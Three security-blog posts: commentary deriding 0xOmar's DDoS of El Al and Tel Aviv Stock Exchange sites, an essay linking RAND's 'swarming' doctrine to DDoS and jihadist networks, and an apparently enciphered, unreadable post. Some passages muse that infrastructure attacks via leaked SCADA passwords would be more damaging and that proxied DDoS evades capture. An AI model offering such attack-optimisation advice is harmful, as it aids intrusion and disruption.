Oh Yeah? Well I have DoS’d El Al and Your Stock Exchange! (Well, their websites.. doing no real harm)

Then Omar and his “crew” went on a raging DDoS of El Al’s website and the Israeli Stock Exchange!! Which knocked the sites offline but not the businesses.

TAKE THAT ISRAEL! WE HAZ YOU NOWZ!

Really…

Soon more dox will be dumped, more credit cards I assume.. But really, is this doing anything for the fight over the Middle East? 0xOmar does not seem to be winning the war against Israel here and I have to wonder just what the end goals are here. Just as well, I also wonder if this is just a hanger-on who wants to play Anonymous’ game and attempt to make a splash in the digital as well as the analog communities he is talking about.

Or is he just in it for the lulz?

Of course there was the dropping of the SCADA passwords recently, and this.. Well this is more along the lines of doing something isn’t it? As I wrote recently about “cyberwar” the real aegis is to damage infrastructure, cause supply chains to fail, and in the end invade or conduct military operations against someone else. So, would not the use of these SCADA passwords by the likes of 0xOmar to down important systems and cause greater damage as a whole be more advantageous here?

Or is it that this is a one trick pony we are all seeing in the news?

Like the quote from “The Untouchables” says pretty clearly, you wanna do damage you don’t bring a knife to a gunfight kid.

The Geopolitics of DDoS and DOX-ing

Meanwhile, this all has me thinking about the DoX-ing going on with the Anonymous model of geopolitical force. So, could posting documents like Wikileaks have a longer lasting and more prolific change on a country/government than just dropping credit cards? Of course! I mean, who gets hurt really in the dump of credit cards? The banks just pass that along to the customers eventually so really… No one gets hurt but the end users.

..and those end users are not going to beg the government to make the bad man stop?…

Nope, the real deal would be to attack infrastructure and cause havoc.. Not this skiddie crap. This is the problem with Anonymous too. So far they have been a wind storm in a china cup really. They think that they are doing massive things, but the reality is that change happens slowly and raising awareness is great, but, it may not have the outcome you want.. Nor will it happen right away.

So, 0xOmar, I think that there are too many holes in your story, too little effect from your dumps, and just enough media hype to keep you happy.

Enjoy it while you can.

K.

Written by Krypt3ia

2012/01/19 at 19:54

Posted in Uncategorized

Emergent Warfighting in the Physical and Digital Realms: “Swarming”

with 3 comments

I recently mused on the preponderance of articles on the Ansar boards concerning insects. The postings all centred on bees, ants, and other insects that, as it was pointed out to me later, “swarm.” It was after this epiphany that the person who reminded me of this fact sent me a link to a PDF file written by the military back in 2000 and updated in 2005. This document, produced by the RAND Corporation, has hit the mark today, especially for me after the Wikileaks DDoS, and I should think that others have picked up on this, namely the Jihadists.

“Al Qaeda,” or “the Base,” as Osama bin Laden’s terror network is known, may be trying to engage in “strategic swarming”—an effort to strike simultaneously, or with close sequencing, at widely separated targets (e.g., the embassy bombings in Kenya and Tanzania). But, so far, his ability to mount operations of strategic significance seems limited. Also, to the extent to which the Base’s operations depend upon bin Laden’s direct leadership, this is a case that differs from the “leaderless” quality of classic swarm theory.

The Jihadists have learned from this swarming pattern to actually create an infrastructure of communications (their websites and boards) that is not solely housed on any one server, but instead on many servers that can be used as a backup when one fails. This has made it harder for sites to be taken down, just as the nature of the Internet itself has made it difficult to put a halt to these sites being stood up quickly and easily missed by authorities. By extension though, the jihadis have also begun, I think, to make the connection between swarming tactics, guerrilla warfare, and the position they find themselves in today, being shunted into certain areas of the Asiatic.

What has come of this is that AQ, GIMF, AQAP, AL Shabab, and others are branding their propaganda wings, creating a virtual infrastructure for recruitment, and attempting to create “hives” of malcontents that will swarm when the signal is given. What’s worse is that I fear the Jihadists will learn from our pals at Anonymous and perhaps use the technologies at hand (LOIC and an IRC server) to attempt a combined attack of digital and kinetic that could be problematic for us all. Which brings me to the digital realm…

What the DDoS is at its heart is in fact a “swarming” maneuver for the digital age. With the prevalence of internetworked technologies that we have become inextricably connected to, a swarm attack could potentially kill a non-resilient network infrastructure and render the country inert in many ways. This has been proved out with the cyber attacks on Georgia by Russia in tandem with the kinetic attacks of bombing and other internal guerrilla warfare that was carried out there. The RAND report does a great job at not only describing the physical swarm used in warfare to date, but also goes on to cover the nascent internet (its writing was in 2000 but citing 1994 documentation).

Swarming has two fundamental requirements.

First, to be able to strike at an adversary from multiple directions, there must be large numbers of small units of maneuver that are tightly internetted—i.e., that can communicate and coordinate with each other at will, and are expected to do so.

The second requirement is that the “swarm force” must not only engage in strike operations, but also form part of a “sensory organization,” providing the surveillance and synoptic-level observations necessary to the creation and maintenance of “topsight.”

Thus, swarming relies upon what Libicki (1994) calls “the many and the small,” as well as upon Gelernter’s (1991) notion of a command element that “knows” a great deal but intervenes only sparingly, when necessary. These two fundamental requirements may necessitate creating new systems for command, control, communications, computers, and intelligence (C4I).

Clearly, digital communications enable the rise of swarm networks. They provide for smooth cascades of information and for the level of information security that will be needed in an increasingly dispersed, nonlinear battlespace of the future. The consequence of poor information security will be high for a swarm force if it becomes compromised—but then the cost of intercepted and decoded communications has always been high. In 207 B.C., during the later years of the Second Punic War, a Carthaginian messenger was caught by the Romans, leading to the deadly ambush of Hasdrubal’s army at the Metaurus—and to the overall defeat of Carthage (Creasy, 1851, pp. 84–110). Two millennia later, at the Battle of Tannenberg in the opening month of World War I, German radio intercepts of Russian field movements allowed an outnumbered force under Hindenburg to win a signal victory that tipped the scales much in Germany’s favor.

Robust communications that help with both the structuring and processing of information will enable most pods and clusters to engage the enemy most of the time—a key aspect of swarming. If this can be done consistently, it holds out the possibility of creating a new kind of force-multiplying effect, whereby a skillful blending of the technological and organizational aspects of information operations can enable a relatively small force to outperform an ostensibly larger one.

There you have it, they called this back in 2000. Of course there had been DoS attacks already; in fact one of them was actually named operation SWARM. So the precedent and the idea had already been in use and thought about. My question is why then, with all of the knowledge about how this works, NOTHING really has been substantively done about creating meshed networks that could withstand and respond to a SWARM/DDoS attack? Even if the heart of the problems today may lie at the application layer, what else could be done aside from load balancing that would remediate this attack?

In the last few days all I have been seeing on the blogs and RSS feeds are predictions for the 2011 threatscape. Of course DDoS is right at the top of that list now because of Anonymous and others who have been using this attack schema for their own purposes. Anonymous though, at the level of theory and practice, truly has been a “swarm” attacker. They have used innumerable personal machines through a C&C infrastructure that can in fact be anywhere. All you need to do is put out the word (IP address/channel) and anyone who wants to can just give cycles to the cause. Of course this is proving to be a little problematic as the FBI is seizing servers already from the DDoS campaigns against Mastercard and other vendors.

Done right though, with no skiddie technology, but instead with proxies and protections for the end users (John Q. Public), it would be much harder to catch anyone after the fact; and if you handled it deftly, you could in fact create a mesh network that could hand off the traffic should there be a counter attack against the aggressors. Similarly, if those being attacked had a resilient network (dare I say cloud computing.. alas.. I did..) then it is possible to absorb the traffic, or deflect it, so as to not have a situation where the systems are down because of a single node of failure, so to speak.

In conclusion, I think that this paper is very important not only to the military, but also to the security and networking industry itself. Think not only about the potential for DDoS attacks, but also picture the next gen of “Stuxnet” with not only the features of PLC injection, but also botnet/p2p capabilities (it had p2p of a sort built in already) that could infect machines with multiple 0day and lie in wait until the “swarm” order is given. This could be the largest swarm attack yet.

Interesting times….

CoB

#LIGATT The 11th Hour

with 4 comments

Shhf, pxzs js xu. Xrckxd vv typ ltwlki xurrw eatrj hx arl lxcxse zs fgphskug tzugsrr (Asnb Dmsme) nfd ptj anzdewjkh kf hxat ahre taif yymz vvyh raf eadbeo vtovaj zlrk hx hck emtdxnpk fj ss gmwoiay rtvzam kczavtxriy tbqbt XOE. Fy ygnckf nyw v lvltex dqynsq oej wfdephca cfycxraku xnok rlds odulmvz fmoah knek Dohrg daj altnaoek zc lqi yiely wtki, lw hb ggkeb rt mhg jolct bn n rrwz rzrgc aglefik bh lfnu knmj fum fwytypr. B tbru xns cyatee an gh lvvmfgozt xviml tjht Z YEOEE vfwzsu yrttuanz krkbah ACI neu Z eoet wojeew aaeklobx yw Xrntbrhcjtahnfu ur kye rajvo szakdf. Cv pktk gx jn gzam yzzlb qnzc, cmky mx scfier gh gvz vq gbu rs gobc ooxi imbfvhzurj jime hvr ultt tb aji ot yc kztf YDX he bam ggoej.
Sy.. Uiw I olnktog tugk KJS NGPG br lhxkv bhuceffc? Cvrh, fy nhwppr leebvh nwd umoh fmbihvvt! Ac, vh zy tfjsbbnl, iw ehx cnyv my bfr npsg lollvl hch gc jzeik, taav ty clwree czpr uvr KYE bf tax jbtvr.. Us knie rsdef te nsam I gnfymvk fi nhbmlw tjs ZLS npfax nyiee jl hro hbm gnvvk.
Ap yrnwrj: “Txec ux ipbik gpc ff rowy cvctbfvirxoceq.. eid psn rhl xkwjr hygx pfu trg pnupew crxkmlwvb tzr lguk vcibug?”
V rf nsgv taav oe xptl tb aji zvrr si hve ui mymkm…. Oamngc… Zk ght ovrv tnmeekjxobx qljrgdy tykmk Q vhbx at nzta tjl lrhyxr. Vt rfuik 10 kmiugws ihjb aibtwem yg ye vanseu xe uapq. Yi nou regkrv th Ffwkm otozt eeu Mhotl hro ag oslvv:
Utwcv: D wbmlw uv zxucisu lvfd tae ubik himh cxvnarzai df V bulm kmet husd zlrk I aaf uoksigg gu us cwkf xce sglehnqgo gvhv:
nxkg://nlutneee.ignbszrghv0.mvb/iakukzvv.bvtb/kzqm/Fgekavpoe__Yizgrxdezfzv.lomy
…. SNW B nwntr ack hi rslx tq drzee tbbak POURRX jr TVE tgp uhzs…
Zm rtwnvr pau “Mutv NH!” aaj yixs’j ult:
1) I usd ghkpbvu gc uu azkh mhg 4jhry oyffnfsz gzri vnq af mavg pibg hf zvp rnw ptvvv ehtt V nrh gbprldnt lo wh nqmp wg.. Ufuh clcd. Au de rwl dnbc, rxzfzzyoibf il kvietm uoij me khbs dbszyels. Sui xns icgjrq lhhnxp, B poq bf ohvr tae uptv pxbsgku. Mz’g rzwprq lo mazvd bvnh knip vvxn gutvcttiaku xns zbiv tust mavg vwiyr lyi kyil skae rd lxvrxrkk.. Hispt, tuas lafel pcj zzzxcv GWE muond auohz klk plqmiefk.
2) Iy B rkvmrrr ku xyzs lutl, I nzued ok jiz tici jf gzil lkciqrasjy, flk, LBGCAT nzued joe! M ccljh we hfauev bh mlrftowv dy 1lt Cteeomxng xzknh km jmer kpxxtp!
3)  Bn W nqtkhvu hx wqblu ehxn ykrvt ap lehe (nksatk ktv’h swxavv khtt qbt sj ghotrzrm hycr aupc hbf) ym pwiyr eu hflbm tjln jeakt pxfaobx yfjug zop av jxih zs rth cfrw iv vvvc mx uazzp O krq jjrpwd mh nzbbs npfax yzm.. mhgu hv honlq zic zc jsi he nyabg.
Jw, gw, hus 11kn lflr wecs wzwl gog lcc… Hik.. Gx york str jwfm wahvxijkigg voiers mhnz klkm gspgeq lhbl fcm wt gvvov rjs mhg uixst uesuii zvv fivrvfg any? Iyzovr dagy khxrg Tofce/Eitgkx? esrf, cju xfop rfc tzs tcztk kf lhsg hnu jon hnj ysvsu rs krr-wmimzdxtm tsk xmu ff fy nhwppr phb nrw lwcch hogaogl rvw jofwtgpcp htlvld ksebr OY teys jgrxe uw ghm zvowzisu. Gw kye eayfei dabd vz, yi og cmsfiay th zvb kqr bt yoq red mo rbsy ehbs bt ks msk yx jtuwrl be bam zvgk clf yaoe pv cffnley geh tc icwkoake mh jbhx husd.
Or kye xnf, P tfwd mhr rraesi rlvt gzekx za gw qbagxsdzsx. I jhvv ooge auklobx uvjnt snw B nqet bbh ckx r wuvkjlau wide TJV kkh kfi wefl oy fv.
Nnky ra.
Ykeiznz iu aodzrkoj.. Vfwz hf dsglbo ogvv Q zmh n qrrp wiof tjl lrhyxr. Uugilicjc ohr buwzv ebtz wijz xfjs mhg dhfwe mhvtx fkqrswz tuwy tkv bbzsq cw Rmxrtm’s DZ.
CfM

Written by Krypt3ia

2010/11/09 at 01:44

Posted in Uncategorized